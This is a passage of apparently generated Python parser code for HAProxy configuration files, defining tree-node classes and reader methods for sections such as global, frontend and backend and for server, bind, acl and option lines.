self.whitespace = elements[3]
self.keyword = elements[2]
self.line_break = elements[6]
self.value = elements[4]
class CommentLine(TreeNode):
def __init__(self, text, offset, elements):
super(CommentLine, self).__init__(text, offset, elements)
self.whitespace = elements[0]
self.comment_text = elements[1]
self.line_break = elements[2]
class BlankLine(TreeNode):
def __init__(self, text, offset, elements):
super(BlankLine, self).__init__(text, offset, elements)
self.whitespace = elements[0]
self.line_break = elements[1]
class Keyword(TreeNode):
def __init__(self, text, offset, elements):
super(Keyword, self).__init__(text, offset, elements)
self.whitespace = elements[1]
class ServiceAddress(TreeNode):
def __init__(self, text, offset, elements):
super(ServiceAddress, self).__init__(text, offset, elements)
self.host = elements[0]
self.port = elements[2]
class ParseError(SyntaxError):
pass
FAILURE = object()
class Grammar(object):
REGEX_1 = re.compile('^[\\n]')
REGEX_2 = re.compile('^[a-z0-9\\-\\_\\.]')
REGEX_3 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_4 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_5 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_6 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_7 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_8 = re.compile('^[^#\\n ]')
REGEX_9 = re.compile('^[^#\\n]')
REGEX_10 = re.compile('^[:]')
REGEX_11 = re.compile('^[\\d]')
REGEX_12 = re.compile('^[\\d]')
REGEX_13 = re.compile('^[\\d]')
REGEX_14 = re.compile('^[\\d]')
REGEX_15 = re.compile('^[\\d]')
REGEX_16 = re.compile('^[a-zA-Z\\-\\.\\d]')
REGEX_17 = re.compile('^[a-zA-Z0-9\\-\\_\\.:]')
REGEX_18 = re.compile('^[^#\\n]')
REGEX_19 = re.compile('^[\\n]')
REGEX_20 = re.compile('^[ \\t]')
REGEX_21 = re.compile('^[ \\t]')
def _read_configuration(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['configuration'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
index2 = self._offset
address1 = self._read_comment_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_blank_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_global_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_defaults_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_userlist_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_listen_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_frontend_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_backend_section()
if address1 is FAILURE:
self._offset = index2
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['configuration'][index0] = (address0, self._offset)
return address0
def _read_global_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['global_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_global_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = GlobalSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['global_section'][index0] = (address0, self._offset)
return address0
def _read_defaults_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['defaults_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_defaults_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = DefaultsSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['defaults_section'][index0] = (address0, self._offset)
return address0
def _read_userlist_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['userlist_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_userlist_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = UserlistSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['userlist_section'][index0] = (address0, self._offset)
return address0
def _read_listen_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['listen_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_listen_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ListenSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['listen_section'][index0] = (address0, self._offset)
return address0
def _read_frontend_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['frontend_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_frontend_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = FrontendSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['frontend_section'][index0] = (address0, self._offset)
return address0
def _read_backend_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_backend_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BackendSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['backend_section'][index0] = (address0, self._offset)
return address0
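# Descriptive note (added): the *_header readers consume leading whitespace,
# the literal section keyword, then (depending on the section) a proxy name,
# service address and value, an optional trailing comment, and the line break.
# When a literal fails at the furthest offset reached so far, the offset and
# the expected token string are recorded for error reporting.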
def _read_global_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['global_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 6]
if chunk0 == 'global':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"global"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
index2 = self._offset
address4 = self._read_comment_text()
if address4 is FAILURE:
address4 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_line_break()
if address5 is not FAILURE:
elements0.append(address5)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = GlobalHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['global_header'][index0] = (address0, self._offset)
return address0
def _read_userlist_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['userlist_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'userlist':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"userlist"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
index2 = self._offset
address5 = self._read_comment_text()
if address5 is FAILURE:
address5 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
address6 = self._read_line_break()
if address6 is not FAILURE:
elements0.append(address6)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = UserlistHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['userlist_header'][index0] = (address0, self._offset)
return address0
def _read_defaults_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['defaults_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'defaults':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"defaults"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
index2 = self._offset
address4 = self._read_proxy_name()
if address4 is FAILURE:
address4 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index3 = self._offset
address6 = self._read_comment_text()
if address6 is FAILURE:
address6 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_line_break()
if address7 is not FAILURE:
elements0.append(address7)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = DefaultsHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['defaults_header'][index0] = (address0, self._offset)
return address0
def _read_listen_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['listen_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 6]
if chunk0 == 'listen':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"listen"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_service_address()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_value()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index4 = self._offset
address8 = self._read_comment_text()
if address8 is FAILURE:
address8 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_line_break()
if address9 is not FAILURE:
elements0.append(address9)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ListenHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['listen_header'][index0] = (address0, self._offset)
return address0
def _read_frontend_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['frontend_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'frontend':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"frontend"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_service_address()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_value()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index4 = self._offset
address8 = self._read_comment_text()
if address8 is FAILURE:
address8 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_line_break()
if address9 is not FAILURE:
elements0.append(address9)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = FrontendHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['frontend_header'][index0] = (address0, self._offset)
return address0
def _read_backend_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 7]
if chunk0 == 'backend':
address2 = TreeNode(self._input[self._offset:self._offset + 7], self._offset)
self._offset = self._offset + 7
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"backend"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BackendHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['backend_header'][index0] = (address0, self._offset)
return address0
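# Descriptive note (added): config_block is a zero-or-more repetition over an
# ordered choice of line types, roughly:
#   config_block <- (server_line / option_line / bind_line / acl_line /
#                    backend_line / group_line / user_line / config_line /
#                    comment_line / blank_line)*
# Each failed alternative rewinds self._offset before the next one is tried.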
def _read_config_block(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['config_block'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
index2 = self._offset
address1 = self._read_server_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_option_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_bind_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_acl_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_backend_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_group_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_user_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_config_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_comment_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_blank_line()
if address1 is FAILURE:
self._offset = index2
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['config_block'][index0] = (address0, self._offset)
return address0
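# Descriptive note (added): the keyword test below compares seven characters
# ('server' plus a trailing space) but only consumes the six-character
# keyword, leaving the space for the following whitespace rule; presumably
# this stops directives that merely start with 'server' (e.g.
# 'server-state-file') from being parsed as server lines.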
def _read_server_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['server_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 7]
if chunk0 == 'server ':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"server"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_server_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
address6 = self._read_service_address()
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index2 = self._offset
address7 = self._read_value()
if address7 is FAILURE:
address7 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index3 = self._offset
address8 = self._read_comment_text()
if address8 is FAILURE:
address8 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_line_break()
if address9 is not FAILURE:
elements0.append(address9)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ServerLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['server_line'][index0] = (address0, self._offset)
return address0
def _read_option_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['option_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 6]
if chunk0 == 'option':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"option"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_keyword()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = OptionLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['option_line'][index0] = (address0, self._offset)
return address0
def _read_bind_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['bind_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 4]
if chunk0 == 'bind':
address2 = TreeNode(self._input[self._offset:self._offset + 4], self._offset)
self._offset = self._offset + 4
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"bind"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespaceplus()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_service_address()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BindLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['bind_line'][index0] = (address0, self._offset)
return address0
def _read_acl_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['acl_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 3]
if chunk0 == 'acl':
address2 = TreeNode(self._input[self._offset:self._offset + 3], self._offset)
self._offset = self._offset + 3
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"acl"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_acl_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = AclLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['acl_line'][index0] = (address0, self._offset)
return address0
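# Descriptive note (added): backend_line accepts either 'use_backend' or
# 'default_backend', a backend name, and an optional 'if'/'unless' condition
# clause, before the usual optional value, optional comment and line break.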
def _read_backend_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 11]
if chunk0 == 'use_backend':
address2 = TreeNode(self._input[self._offset:self._offset + 11], self._offset)
self._offset = self._offset + 11
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"use_backend"')
if address2 is FAILURE:
self._offset = index2
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 15]
if chunk1 == 'default_backend':
address2 = TreeNode(self._input[self._offset:self._offset + 15], self._offset)
self._offset = self._offset + 15
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"default_backend"')
if address2 is FAILURE:
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_backend_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index3 = self._offset
index4 = self._offset
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 2]
if chunk2 == 'if':
address6 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"if"')
if address6 is FAILURE:
self._offset = index4
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 6]
if chunk3 == 'unless':
address6 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"unless"')
if address6 is FAILURE:
self._offset = index4
if address6 is FAILURE:
address6 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_whitespace()
if address7 is not FAILURE:
elements0.append(address7)
